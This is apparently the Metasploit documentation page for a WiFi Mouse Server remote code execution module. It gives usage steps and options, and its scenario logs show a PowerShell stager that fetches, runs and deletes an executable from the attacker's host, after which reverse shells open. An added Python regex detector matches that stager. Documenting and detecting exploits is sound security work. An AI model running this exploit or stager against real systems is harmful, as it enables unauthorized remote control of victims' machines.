
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md

Vulnerable Application

The WiFi Mouse (Mouse Server) from Necta LLC contains an authentication bypass: authentication is implemented entirely on the client side, so the server accepts commands from any connecting client. By exploiting this, it is possible to open a program on the server (cmd.exe in our case) and type commands into it, resulting in remote code execution.

Version 1.8.3.4 (current at the time the module was written) and all earlier versions are vulnerable.

Version 1.8.3.4 can be downloaded from https://wifimouse.necta.us/apk/MouseServer.exe at the time of writing.

Version 1.8.3.0 can be downloaded from https://wifimouse.necta.us/apk/MouseServer1.8.3.0.exe

Version 1.8.2.3 can be downloaded from Exploit-DB (edb) or from https://wifimouse.necta.us/apk/MouseServer1.8.2.3.exe

Version 1.7.8.5 can be downloaded from https://wifimouse.necta.us/apk/MouseServerLatest.exe

Targets

Stager

This is Metasploit's cmd stager. It has two flavors, which can be selected through the advanced option CMDSTAGER::FLAVOR.

  1. psh_invokewebrequest (default): types a single command that pulls back the payload, and is fast. Use it in almost all circumstances.

  2. certutil: the whole payload is typed out and appears on the user's screen, which makes this flavor unreliable (it needs roughly 3.5 minutes without interference). If the user types anything or moves focus to another window, the exploit will fail.
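From the defender's side, the most recognisable artifact of this module is the command line the stager types into cmd.exe: the psh_invokewebrequest flavor shown in the scenario below writes a download to %TEMP% with Invoke-WebRequest, runs it, then deletes it, all chained with "&". The following Python is an added detection example written for this page, not code from the Metasploit module or from Necta; it runs a regex check over a handful of constructed process-creation events. The certutil event is an assumed shape of that flavor (certutil -decode of a staged file in %TEMP%, then execution), not output taken from the page.

```python
import re

# Constructed sample process-creation events (the shape an EDR or Sysmon
# Event ID 1 record would give you). Hosts and command lines are invented
# for this example; the first one mirrors the stager printed in the module output.
SAMPLE_EVENTS = [
    {"host": "WIN10PROLICENSE", "parent": "cmd.exe",
     "cmdline": ("powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\IDcEhcbA.exe "
                 "http://1.1.1.1:8080/qGn4ESH & %TEMP%\\IDcEhcbA.exe & del %TEMP%\\IDcEhcbA.exe")},
    # Assumed shape of the certutil flavor (not shown verbatim on the page).
    {"host": "WIN10PROLICENSE", "parent": "cmd.exe",
     "cmdline": "certutil -decode %TEMP%\\stage.b64 %TEMP%\\stage.exe & %TEMP%\\stage.exe"},
    # Benign: a download with no execute-and-delete chain and no %TEMP% executable.
    {"host": "ADMIN-PC", "parent": "powershell.exe",
     "cmdline": "powershell.exe -c Invoke-WebRequest -OutFile C:\\Reports\\weekly.csv https://intranet.example/report"},
    {"host": "ADMIN-PC", "parent": "explorer.exe",
     "cmdline": "notepad.exe C:\\notes.txt"},
]

# An executable dropped directly under %TEMP% (single backslash in the real command line).
TEMP_EXE = r"%TEMP%\\[A-Za-z0-9_]+\.exe"

PATTERNS = {
    # Invoke-WebRequest -OutFile <%TEMP% exe> ... & <%TEMP% exe> & del <%TEMP% exe>
    "psh_invokewebrequest_stager": re.compile(
        r"powershell(\.exe)?\s.*Invoke-WebRequest\s.*-OutFile\s+" + TEMP_EXE
        + r".*&\s*" + TEMP_EXE + r".*&\s*del\s+" + TEMP_EXE,
        re.IGNORECASE),
    # certutil -decode <%TEMP% file> <%TEMP% exe>  (assumed certutil flavor shape)
    "certutil_decode_temp": re.compile(
        r"certutil(\.exe)?\s.*-decode\s+%TEMP%\\\S+\s+" + TEMP_EXE,
        re.IGNORECASE),
}


def classify(event):
    """Return the name of the first stager pattern the command line matches, else None."""
    for name, rx in PATTERNS.items():
        if rx.search(event["cmdline"]):
            return name
    return None


def scan(events):
    """Return (host, pattern, parent_is_cmd, cmdline) for every suspicious event.

    The module opens cmd.exe and types into it, so a cmd.exe parent is extra
    context worth surfacing alongside the match.
    """
    hits = []
    for e in events:
        name = classify(e)
        if name is not None:
            hits.append((e["host"], name, e["parent"].lower() == "cmd.exe", e["cmdline"]))
    return hits


if __name__ == "__main__":
    for host, name, from_cmd, cmdline in scan(SAMPLE_EVENTS):
        print(f"[{host}] {name} (parent cmd.exe: {from_cmd}): {cmdline}")
```

The regexes are deliberately anchored on the download-execute-delete chain into %TEMP% rather than on Invoke-WebRequest alone, so ordinary administrative downloads (the third sample) do not fire; a WiFi Mouse listener on TCP 1978, as seen in the scenario output, is the other host-level indicator to pair this with.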

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/windows/misc/wifi_mouse_rce

  4. Set rhost and lhost as required.

  5. Do: run

  6. You should get a shell as the user who is running Wifi Mouse (Mouse Server).

Options

SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.

LINEMAX

The maximum length of each line sent to the server for processing. While the program appears to accept ~2048 characters, anything over ~1020 tends to crash it; 1000 - 1020 should be safe. Defaults to 1020.

Scenarios

Wifi Mouse (Mouse Server) 1.8.3.4 on Windows 10 using psh_invokewebrequest Stager

resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mouse.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (mouse.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/wifi_mouse_rce) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:1978 - Opening command prompt
[*] 2.2.2.2:1978 - Typing out payload
[*] 2.2.2.2:1978 - Using URL: http://1.1.1.1:8080/qGn4ESH
[*] 2.2.2.2:1978 - Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\IDcEhcbA.exe http://1.1.1.1:8080/qGn4ESH & %TEMP%\\IDcEhcbA.exe & del %TEMP%\\IDcEhcbA.exe"]
[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (146/146 bytes)
[*] 2.2.2.2:1978 - Client 2.2.2.2 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.98) requested /qGn4ESH
[*] 2.2.2.2:1978 - Sending payload to 2.2.2.2 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.98)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50211) at 2022-09-21 16:29:06 -0400
[*] 2.2.2.2:1978 - Server stopped.

Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----

C:\Windows\system32>whoami
whoami
win10prolicense\windows

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299

Wifi Mouse (Mouse Server) 1.8.2.3 on Windows 10 using certutil Stager

resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mouse.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (mouse.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (mouse.rb)> set CMDSTAGER::FLAVOR certutil
CMDSTAGER::FLAVOR => certutil
msf6 exploit(windows/misc/wifi_mouse_rce) > set verbose false
verbose => false
msf6 exploit(windows/misc/wifi_mouse_rce) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:1978 - Opening command prompt
[*] 2.2.2.2:1978 - Typing out payload
[*] 2.2.2.2:1978 - Command Stager progress - 1.01% done (1019/100776 bytes)
[*] 2.2.2.2:1978 - Command Stager progress - 2.02% done (2038/100776 bytes)
[*] 2.2.2.2:1978 - Command Stager progress - 3.03% done (3057/100776 bytes)
...
[*] 2.2.2.2:1978 - Command Stager progress - 98.08% done (98843/100776 bytes)
[*] 2.2.2.2:1978 - Command Stager progress - 99.09% done (99862/100776 bytes)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (100776/100776 bytes)
[*] Command shell session 3 opened (1.1.1.1:4444 -> 2.2.2.2:50926) at 2022-09-04 15:11:29 -0400

Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----

C:\Program Files (x86)\MouseServer.exe>whoami
whoami
win10prolicense\windows

C:\Program Files (x86)\MouseServer.exe>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299